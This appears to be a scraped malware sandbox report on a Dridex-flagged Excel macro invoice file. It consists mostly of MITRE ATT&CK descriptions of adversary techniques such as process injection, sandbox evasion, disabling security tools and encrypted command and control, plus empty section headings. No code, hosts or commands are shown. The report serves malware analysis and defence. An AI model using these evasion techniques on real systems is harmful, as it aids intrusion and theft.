Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report INV9698791470-20210111920647.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/338095/sample/INV9698791470-20210111920647.xlsm"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3215

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 1639

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 999

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre